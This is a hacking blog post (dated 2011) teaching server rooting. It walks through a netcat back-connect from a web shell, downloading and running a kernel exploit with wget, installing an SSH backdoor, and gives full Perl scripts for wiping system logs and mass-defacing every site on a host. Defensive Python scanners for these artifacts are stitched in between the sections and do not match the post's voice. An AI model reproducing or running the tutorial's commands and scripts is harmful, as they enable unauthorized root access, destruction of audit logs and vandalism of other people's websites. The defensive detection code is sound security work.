Sunday, October 16, 2011

Server Rooting Via Shell and Mass defacement script


Hey folks, the topic which I'm gonna share is not purely my own work. I've tried it only once (if you wanna believe it). Server rooting is the process where an attacker intrudes into a system, or you can say a server, and escalates to ROOT privileges. Now we are going to learn how it works.


Requisites:
   A Shell on a website
   An Exploit
   Log cleaner
   Ssh Backdoor
   Netcat
   A Brain
   Get these from Google ;) lolz

 What is rooting?
Ans: Mentioned above..

 What is the need of rooting?
Ans: Don't ask me.. :)

Now let's kill the root:

Getting Backconnection to the server-
   Copy the Netcat directory to C:\
   Open command prompt, type: cd C:\NETCAT
It'll look like this:

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\kislay>cd c:\netcat
c:\netcat>

   Now Type: nc -l -v -p 2121
It'll look like-

c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...


   Open your shell in your browser and go to the backconnection tab. If it is not there, get a shell like "B374k" or any other; that's your choice.

   Specify your IP & port as 2121 and press connect. Now you'll get a shell to the server, and you can give commands to the server through that shell.

 Getting the right exploit for the server-

   Type: uname -a & hit enter.

It'll look something like this:

[admin@www.saijyotishvani.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010
x86_64 x86_64 x86_64 GNU/Linux

  It shows the kernel version of the server is 2.6.18-194.26.1.el5
& the year is 2010.
   You need to find a matching exploit for it. You can find them at-

# Exploit-db.com
# Packetstormsecurity.org
# Th3-0utl4ws.com
# Leetupload.com
# r00tw0rm.com

# Compiling & executing exploit-
 
Now I've got an exploit, & it is written in C, so I can't execute it just by uploading it;
I need to compile it.
 
Before proceeding further, cd into the tmp directory, coz it is always writable. So type:
cd /home/XXXXX/public_html/tmp

// The path can be different, replace it with yours.
   So first I'll get the exploit onto the server, so I type: wget http://exploitsite.net/exploits/my_exploit.c

// Note: There is no such site, I'm just taking it to show you.
It'll look something Like this-

[admin@www.targetsite.com /home/saijyoti/public_html/tmp]$ wget http://exploitsite.net/exploits/my_exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/exploits/my_exploit.c
Resolving www.exploitsite.net... 120.139.90.84
Connecting to www.exploitsite.net|120.139.90.84|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `my_exploit.c'
0K .......... .... 100% 189K=0.08s
2011-01-25 08:21:44 (189 KB/s) - `my_exploit.c' saved [15088/15088]

   Now change the permissions of the exploit to 777.
Type: chmod 777 my_exploit.c
It may look like:

[admin@www. targetsite.com /home/targetsite/public_html/tmp]$ chmod 777 ImpelDown.c

   Now the exploit is on my server; I just need to compile & execute it.
So I'll give the command: gcc -o exploit exploit.c
It'll compile & save the exploit as exploit
It may look like-

[admin@www.targetsite.com /home/targetsite/public_html/tmp]$ gcc -o exploit exploit.c

   The next step is to execute it, so we'll type: ./exploit
It may look like:

[admin@www.targetsite.com /home/targetsite/public_html/tmp]$ ./exploit
got root you m0f0 !!

   Now it says got root. Let's check whether it's true.
Type: id
It may look like

uid=0(saijyoti) gid=0(saijyoti) groups=0(root)

   Which Means I got root :)
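Seen from the server's side, the steps above leave three things behind in a web-writable tmp directory: a C source file, a freshly compiled ELF binary, and a file whose mode was set to 777. The script below is an added example, not code from the original post: it walks a document root and reports exactly those artifacts. The directory layout and file names it builds are constructed in a temporary directory to mirror the walk-through, and the list of source suffixes is an assumption for the example.

```python
import os
import stat
import tempfile
from pathlib import Path

ELF_MAGIC = b"\x7fELF"                          # first four bytes of every ELF executable
SOURCE_SUFFIXES = {".c", ".cpp", ".pl", ".py"}  # assumed: source files do not belong in a docroot tmp dir


def scan_webroot(root):
    """Walk `root` and report artifacts that should not live under a web-writable path.

    Returns a list of (kind, relative_path) tuples, kind being one of
    'elf-binary', 'source-file' or 'world-writable'.
    """
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        st = path.lstat()                       # lstat: do not follow symlinks out of the tree
        if not stat.S_ISREG(st.st_mode):
            continue
        rel = str(path.relative_to(root))
        with open(path, "rb") as fh:
            head = fh.read(len(ELF_MAGIC))
        if head == ELF_MAGIC:
            findings.append(("elf-binary", rel))
        if path.suffix.lower() in SOURCE_SUFFIXES:
            findings.append(("source-file", rel))
        if st.st_mode & stat.S_IWOTH:           # the 'chmod 777' step above sets exactly this bit
            findings.append(("world-writable", rel))
    return findings


def build_sample_tree():
    """Construct a throwaway docroot mirroring the walk-through: a source file and a built binary."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "public_html").mkdir()
    index = root / "public_html" / "index.html"
    index.write_text("<html>site</html>\n")
    os.chmod(index, 0o644)
    tmp = root / "public_html" / "tmp"
    tmp.mkdir()
    src = tmp / "my_exploit.c"
    src.write_bytes(b"int main(void) { return 0; }\n")   # placeholder contents, not an exploit
    os.chmod(src, 0o777)
    binary = tmp / "exploit"
    binary.write_bytes(ELF_MAGIC + b"\x02\x01\x01" + bytes(9))  # only the header bytes matter here
    os.chmod(binary, 0o755)
    return str(root)


if __name__ == "__main__":
    for kind, rel in scan_webroot(build_sample_tree()):
        print(f"{kind:15} {rel}")
```

Run against the real document roots on a cron schedule, the scan turns the "always writable tmp directory" the walk-through relies on into a tripwire. The complementary mitigation is to mount such directories with `noexec` and to keep compilers off production web hosts, so that neither the `gcc` nor the `./exploit` step has anything to work with.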

# Installing Backdoor-
 
Type: wget urlofbackdoor.com/sshdoor.zip
   Then type:

unzip sshdoor.zip

   Then type: ./run pass port

^ Replace pass with your password, & port with a port.

   Now connect with PuTTY & enjoy root privileges. ;)
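Both the back-connect shell from the first section (a PHP or Apache worker holding an outbound session to a listener on port 2121) and the extra sshd started by the backdoor above are visible in a plain socket listing. The following is an added example, not code from the original post: it parses lines laid out like `ss -tnp` output and flags established sessions from web-server processes to ports they have no reason to reach, plus known daemons listening on ports they are not expected to bind. The sample listing is constructed, not captured from a real host, and the process names and port allowlists are assumptions to tune per environment.

```python
import re

# Constructed sample in the layout of `ss -tnp` output; not captured from a real host.
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port   Peer Address:Port    Process
LISTEN 0      128    0.0.0.0:22           0.0.0.0:*            users:(("sshd",pid=812,fd=3))
LISTEN 0      128    0.0.0.0:80           0.0.0.0:*            users:(("httpd",pid=1020,fd=4))
LISTEN 0      128    0.0.0.0:31337        0.0.0.0:*            users:(("sshd",pid=5519,fd=3))
ESTAB  0      0      10.0.0.5:43112       203.0.113.7:2121     users:(("php-cgi",pid=2201,fd=5))
ESTAB  0      0      10.0.0.5:80          198.51.100.9:51422   users:(("httpd",pid=1021,fd=9))
ESTAB  0      0      10.0.0.5:51000       10.0.0.20:3306       users:(("php-cgi",pid=2202,fd=6))
"""

# Assumed policy for this host (tune per environment):
WEB_PROCESSES = {"httpd", "apache2", "nginx", "php-cgi", "php-fpm"}   # processes that serve requests
ALLOWED_OUTBOUND_PORTS = {80, 443, 3306}                              # where web workers may connect
EXPECTED_LISTEN_PORTS = {"sshd": {22}, "httpd": {80, 443}}            # daemon -> ports it should bind

LINE_RE = re.compile(
    r'^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)


def _port(endpoint):
    """Return the port of 'addr:port', or None for the wildcard '*'."""
    port = endpoint.rsplit(":", 1)[1]
    return None if port == "*" else int(port)


def parse_ss(text):
    """Turn ss-style lines into dicts; the header and anything unparsable is skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rows.append({
            "state": m.group("state"),
            "local_port": _port(m.group("local")),
            "peer": m.group("peer"),
            "peer_port": _port(m.group("peer")),
            "proc": m.group("proc"),
            "pid": int(m.group("pid")),
        })
    return rows


def find_suspicious(rows):
    """Flag web workers with outbound sessions to odd ports, and known daemons on unexpected ports."""
    findings = []
    for r in rows:
        if r["state"] == "ESTAB" and r["proc"] in WEB_PROCESSES:
            serving = r["local_port"] in (80, 443)      # answering an inbound request: normal
            if not serving and r["peer_port"] not in ALLOWED_OUTBOUND_PORTS:
                findings.append(("backconnect", r["proc"], r["pid"], r["peer"]))
        elif r["state"] == "LISTEN" and r["proc"] in EXPECTED_LISTEN_PORTS:
            if r["local_port"] not in EXPECTED_LISTEN_PORTS[r["proc"]]:
                findings.append(("unexpected-listener", r["proc"], r["pid"], r["local_port"]))
    return findings


if __name__ == "__main__":
    for finding in find_suspicious(parse_ss(SAMPLE_SS_OUTPUT)):
        print(finding)
```

On the sample, the php-cgi worker talking to port 2121 and the second sshd on port 31337 are the two findings; the worker's MySQL session and the inbound HTTP connection pass. An egress firewall rule that denies outbound connections from the web server's uid closes the back-connect path outright, which is cheaper than detecting it after the fact.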
##################################################################################

   Methods to execute exploits written in other languages-
# C exploit
gcc -o exploit exploit.c
chmod +x exploit
./exploit
# Perl
perl exploit.pl
# Python
python exploit.py
# PHP
php exploit.php
# zip
unzip exploit.zip
./run

##################################################################################

   Cleaning Logs-

# You can use my log cleaner to clear your tracks :D. It is written in Perl. Save it as
anything.pl
& to execute type: perl anything.pl
Here is the code-
[perl]

#!usr/bin/perl -w #Warnings enabled!
#Log cleaner version Public
#Give Credits Where Needed - Kouros!
#This took time, Hope you fucking use it :D
#Report bugs to info@Kouros-bl4ckhat.com
#NOTE - YOU MUST BE ROOT!
print qq^
####################################
# Log Cleaner 3.0 PUBLIC #
# Kouros #
# #
# Virangar Security Team #
# http://www.Kouros-bl4ckhat.com #
####################################
^;
while(1) {
print "Enter Which OS: "; #User Input
chomp($os = <STDIN>); #Takes it into memory
if($os eq "help"){
print "[+]Enter Your OS! Choose from 'linux', 'aix', 'sunos', 'irix'\n";
print "[+]Hit enter with OS, Let the script do its work\n";
print "[+]Note: You MUST Be Root!\n";
print "[+]Contact Info[at]Kouros-bl4ckhat [dot] Com";
print "[+]For Bug finds... Have Fun!\n";
print "[+] - Kouros";
}
if($os eq "linux"){ #If linux typed, do the following and start brackets
foreach my $logphile(@linux) {
unlink($logphile) || print "[-]Fucked up: \"$logphile\" : $!\n";
}
} elsif($os eq "sunos"){ #If sunos typed, do the following and start brackets
foreach my $logphile(@sunos) {
unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";
}
} elsif($os eq "aix"){ #If aix typed, do the following and start brackets
foreach my $logphile(@aix) {
unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";
}
} elsif($os eq "irix"){ #If irix typed, do the following and start bracket
foreach my $logphile(@irix) {
unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";
}
} else { print"Umm WTF !?\n"; }
#Logs of Irix Systems
{ #Start Irix Bracket
@irix = ("/var/adm/SYSLOG", "/var/adm/sulog", "/var/adm/utmp", "/var/adm/utmpx",
"/var/adm/wtmp", "/var/adm/wtmpx", "/var/adm/lastlog/",
"/usr/spool/lp/log", "/var/adm/lp/lp-errs", "/usr/lib/cron/log",
"/var/adm/loginlog", "/var/adm/pacct", "/var/adm/dtmp",
"/var/adm/acct/sum/loginlog", "var/adm/X0msgs", "/var/adm/crash/vmcore",
"/var/adm/crash/unix") #End Array
} #End Irix Bracket
#Log sof Aix Systems
{ #Start Aix Bracket
@aix = ("/var/adm/pacct", "/var/adm/wtmp", "/var/adm/dtmp", "/var/adm/qacct",
"/var/adm/sulog", "/var/adm/ras/errlog", "/var/adm/ras/bootlog",
"/var/adm/cron/log", "/etc/utmp", "/etc/security/lastlog",
"/etc/security/failedlogin", "usr/spool/mqueue/syslog") #End Array
} #End Aix Bracket
#Logs of SunOS Systems
{ #Start SunOS Bracket
@sunos = ("/var/adm/messages", "/var/adm/aculogs", "/var/adm/aculog",
"/var/adm/sulog", "/var/adm/vold.log", "/var/adm/wtmp",
"/var/adm/wtmpx", "/var/adm/utmp", "/var/adm/utmpx",
"/var/adm/log/asppp.log", "/var/log/syslog",
"/var/log/POPlog", "/var/log/authlog", "/var/adm/pacct",
"/var/lp/logs/lpsched", "/var/lp/logs/requests",
"/var/cron/logs", "/var/saf/_log", "/var/saf/port/log") #End Array
} #End Sunos bracket
#Logs of Linux Systems
{ #Start Linux Bracket
@linux = ("/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp",
"/var/log/secure","/root/.ksh_history", "/root/.bash_history",
"/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp",
"/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs",
"/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
"/var/log/messages/", "/var/log/proftpd/xferlog.legacy",
"/var/log/proftpd.xferlog", "/var/log/proftpd.access_log",
"/var/log/httpd/error_log", "/var/log/httpsd/ssl_log",
"/var/log/httpsd/ssl.access_log", "/etc/mail/access",
"/var/log/qmail", "/var/log/smtpd", "/var/log/samba",
"/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority",
"/var/log/poplog", "/var/log/news.all", "/var/log/spooler",
"/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
"/var/log/news/news.crit", "/var/log/news/news.err",
"/var/log/news/news.notice",
"/var/log/news/suck.err", "/var/log/news/suck.notice",
"/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks",
"/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log",
"/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs",
"/var/log/auth") #End array
} #End linux bracket
} #Ends Loop
[/perl]
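The cleaner above does not edit log entries; it unlinks whole files, which is the easiest kind of tampering to notice if the defender keeps a record of each log's inode and size. The following is an added example, not part of the original post: a baseline-and-compare check that reports logs that were deleted, replaced (inode changed) or truncated (size went down). The watched paths in `DEFAULT_WATCH` are taken from the Linux list in the script; `demo()` builds constructed logs in a temporary directory and tampers with three of them.

```python
import os
import tempfile
from pathlib import Path

# Paths the cleaner above targets on Linux; an assumed watch list for this example.
DEFAULT_WATCH = ["/var/log/wtmp", "/var/run/utmp", "/var/log/lastlog",
                 "/var/log/secure", "/var/log/messages", "/root/.bash_history"]


def snapshot(paths):
    """Record inode, size and mtime of each watched file; a missing file is recorded as None."""
    snap = {}
    for p in paths:
        try:
            st = os.stat(p)
            snap[p] = {"ino": st.st_ino, "size": st.st_size, "mtime": st.st_mtime}
        except FileNotFoundError:
            snap[p] = None
    return snap


def compare(baseline, current):
    """Return (path, event) pairs for logs that were deleted, replaced or shrank since the baseline."""
    alerts = []
    for p, before in baseline.items():
        if before is None:
            continue                                   # was already absent; nothing to compare
        after = current.get(p)
        if after is None:
            alerts.append((p, "deleted"))              # unlink(), which is what the cleaner does
        elif after["ino"] != before["ino"]:
            alerts.append((p, "replaced"))             # new inode: rotated, or removed and recreated
        elif after["size"] < before["size"]:
            alerts.append((p, "truncated"))            # append-only logs never shrink on their own
    return alerts


def demo():
    """Build constructed logs in a temp dir, tamper with three of them, and return the alerts."""
    d = Path(tempfile.mkdtemp(prefix="logwatch-"))
    logs = [str(d / name) for name in ("wtmp", "secure", "messages", "lastlog")]
    for p in logs:
        Path(p).write_bytes(b"constructed log content\n" * 100)
    base = snapshot(logs)
    os.unlink(logs[0])                                  # deleted
    Path(logs[1]).write_bytes(b"")                      # truncated in place (same inode)
    Path(logs[2] + ".new").write_bytes(b"fresh\n" * 100)
    os.replace(logs[2] + ".new", logs[2])               # replaced (different inode)
    return compare(base, snapshot(logs))


if __name__ == "__main__":
    for path, event in demo():
        print(f"{event:10} {path}")
```

Two practical notes: the baseline must live off the host (the cleaner runs as root and would remove it otherwise), and logrotate legitimately produces "replaced" or "truncated" events at rotation time, so the check should be reconciled with the rotation schedule. Shipping logs to a remote collector as they are written makes local deletion moot, which is the stronger control.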
##################################################################################

   Mass deface- I've a Perl script to mass deface sites on the server. Execute it the same way
as above.
[perl]
# MSRml V 0.1 #
# #
# MOROCCO.SECURITY.RULZ mass defacer and log eraser #
# #
# coded by PRI[ll #
# #
# !!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!! #
# #
# 05/07/2005 #
# #
 # usage : perl MSRml.pl <path to index> #
# #
# example : perl MSRml.pl /tmp/index.html #
# #
# the_r00t3r@hotmail.com #
#!/usr/bin/perl
use strict;
my $index = $ARGV[0];
if ($ARGV[0])
{
if( -e $index )
{
system "echo -e "33[01;34mStarted MSRml V0.1 by PRI[ll Ok !!33[01;37m"n";
system "echo -e "\033[01;37mDefacing all homepages ..."n";
system "find / -name "index*" -exec cp $index {} \;";
system "find / -name "main*" -exec cp $index {} \;";
system "find / -name "home*" -exec cp $index {} \;";
system "find / -name "default*" -exec cp $index {} \;";
system "echo -e "\033[01;37m[+] done ! all sites in this box are defaced !"n";
system "echo -e "\033[01;37m----------------------------------------------------------"n";
system "echo -e "\033[01;37mCleaning up logs ..."n";
system "echo -e "33[01;34m---------erasing default log files (too fast
=))---------33[01;37m"n";
if( -e "/var/log/lastlog" )
{
system 'rm -rf /var/log/lastlog';
system "echo -e "\033[01;37m [*]/var/log/lastlog -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/log/lastlog - No such file or directory\033[01;37m"n";
}
if( -e "/var/log/wtmp" )
{
system 'rm -rf /var/log/wtmp';
system "echo -e "\033[01;37m [*]/var/log/wtmp -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/log/wtmp - No such file or directory\033[01;37m"n";
}
if( -e "/etc/wtmp" )
{
system 'rm -rf /etc/wtmp';
system "echo -e "\033[01;37m [*]/etc/wtmp -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/etc/wtmp - No such file or directory\033[01;37m"n";
}
if( -e "/var/run/utmp" )
{
system 'rm -rf /var/run/utmp';
system "echo -e "\033[01;37m [*]/var/run/utmp -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/run/utmp - No such file or directory\033[01;37m"n";
}
if( -e "/etc/utmp" )
{
system 'rm -rf /etc/utmp';
system "echo -e "\033[01;37m [*]/etc/utmp -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/etc/utmp - No such file or directory\033[01;37m"n";
}
if( -e "/var/log" )
{
system 'rm -rf /var/log';
system "echo -e "\033[01;37m [*]/var/log -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/log - No such file or directory\033[01;37m"n";
}
if( -e "/var/logs" )
{
system 'rm -rf /var/logs';
system "echo -e "\033[01;37m [*]/var/logs -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/logs - No such file or directory\033[01;37m"n";
}
if( -e "/var/adm" )
{
system 'rm -rf /var/adm';
system "echo -e "\033[01;37m [*]/var/adm -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/adm - No such file or directory\033[01;37m"n";
}
if( -e "/var/apache/log" )
{
system 'rm -rf /var/apache/log';
system "echo -e "\033[01;37m [*]/var/apache/log -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/apache/log - No such file or directory\033[01;37m"n";
}
if( -e "/var/apache/logs" )
{
system 'rm -rf /var/apache/logs';
system "echo -e "\033[01;37m [*]/var/apache/logs -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/apache/logs - No such file or directory\033[01;37m"n";
}
if( -e "/usr/local/apache/log" )
{
system 'rm -rf /usr/local/apache/log';
system "echo -e "\033[01;37m [*]/usr/local/apache/log -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/usr/local/apache/log - No such file or
directory\033[01;37m"n";
}
if( -e "/usr/local/apache/logs" )
{
system 'rm -rf /usr/local/apache/logs';
system "echo -e "\033[01;37m [*]/usr/local/apache/logs -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/usr/local/apache/logs - No such file or
directory\033[01;37m"n";
}
if( -e "/root/.bash_history" )
{
system 'rm -rf /root/.bash_history';
system "echo -e "\033[01;37m [*]/root/.bash_history -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/root/.bash_history - No such file or directory\033[01;37m"n";
}
if( -e "/root/.ksh_history" )
{
system 'rm -rf /root/.ksh_history';
system "echo -e "\033[01;37m [*]/root/.ksh_history -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/root/.ksh_history - No such file or directory\033[01;37m"n";
}
system "echo -e "\033[01;37m[+] -----done all default log and bash_history files erased !!"n";
system "echo -e "33[01;34m---------Now Erasing the rest of the machine log files (can be
long :S)---------33[01;37m"n";
system 'find / -name *.bash_history -exec rm -rf {} ;';
system "echo -e "\033[01;37m[*] all *.bash_history files -erased Ok!"n";
system 'find / -name *.bash_logout -exec rm -rf {} ;';
system "echo -e "\033[01;37m[*] all *.bash_logout files -erased Ok!"n";
system 'find / -name "log*" -exec rm -rf {} ;';
system "echo -e "\033[01;37m[*] all log* files -erased Ok!"n";
system 'find / -name *.log -exec rm -rf {} ;';
system "echo -e "\033[01;37m[*] all *.log files -erased Ok!"n";
system "echo -e "33[01;34m-------[+] !done all log files erased![+]-------33[01;37m"n";
system "echo -e "33[01;34m---------------------------------------------------33[01;37m"n";
system "echo -e "33[01;34m-----------------MSRml V 0.1----------------------33[01;37m"n";
}
else
{
system "echo -e "\033[01;31m[-] Failed ! the path to u're index could not be found
!\033[01;37m"n";
exit;
}
}
else
{
system "echo -e "\033[01;37m!!Morocco.Security.Rulz mass defacer and log eraser !!"n";
system "echo -e "\033[01;37m!!!!!!!!!!!!!!!!!!coded by PRI[ll!!!!!!!!!!!!!!!!!!!!!!!!"n";
system "echo -e
"\033[01;31m!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!\033[01;37m"n";
system "echo -e "\033[01;37musage : perl $0 <path too u're index>"n";
system "echo -e "\033[01;37mexample : perl $0 /tmp/index.html"n";
exit;
}
[/perl]
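The defacer above copies one page over every file named index*, main*, home* or default* on the box. That leaves a signature a host with many virtual hosts can check for: entry pages on unrelated sites suddenly hashing to identical bytes. The following is an added example, not code from the original post: it baselines the content hash of every entry page under a set of document roots and, on a later run, groups changed pages by digest so a mass defacement stands out from a single site editing its own front page. The vhost layout in `demo()` is constructed in a temporary directory.

```python
import hashlib
import tempfile
from collections import defaultdict
from pathlib import Path

# File-name prefixes the mass defacer overwrites (from its find patterns above).
WATCHED_PREFIXES = ("index", "main", "home", "default")


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline(docroots):
    """Map every entry-page file under the given docroots to its content digest."""
    snap = {}
    for root in docroots:
        for p in Path(root).rglob("*"):
            if p.is_file() and p.name.lower().startswith(WATCHED_PREFIXES):
                snap[str(p)] = sha256_file(p)
    return snap


def detect(base, docroots):
    """Compare the docroots against `base`; group changed pages by digest to expose a mass deface."""
    now = baseline(docroots)
    changed = sorted(p for p, digest in now.items() if base.get(p) != digest)
    missing = sorted(p for p in base if p not in now)
    by_digest = defaultdict(list)
    for p in changed:
        by_digest[now[p]].append(p)
    # Independent sites do not edit their front pages to identical bytes at the same time:
    mass = {d: ps for d, ps in by_digest.items() if len(ps) >= 2}
    return {"changed": changed, "missing": missing, "mass": mass}


def demo():
    """Constructed vhost tree: three sites, then the same page copied over every index.html."""
    top = Path(tempfile.mkdtemp(prefix="vhosts-"))
    roots = []
    for site in ("alpha", "bravo", "charlie"):
        docroot = top / site / "public_html"
        docroot.mkdir(parents=True)
        (docroot / "index.html").write_text(f"<h1>{site}</h1>\n")
        (docroot / "about.html").write_text("about page\n")   # not an entry page, not watched
        roots.append(str(docroot))
    base = baseline(roots)
    for r in roots:
        (Path(r) / "index.html").write_text("<h1>constructed replacement page</h1>\n")
    return detect(base, roots)


if __name__ == "__main__":
    result = demo()
    print(f"{len(result['changed'])} entry pages changed, {len(result['missing'])} missing")
    for digest, pages in result["mass"].items():
        print(f"identical replacement {digest[:12]}... on {len(pages)} sites")
```

The baseline belongs off-host for the same reason as the log baseline: the script runs as root. A single changed page is a normal content update and only warrants a notice; the same digest appearing on two or more sites at once is the condition worth paging on, and the baseline doubles as the restore list.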

 

The Hacker News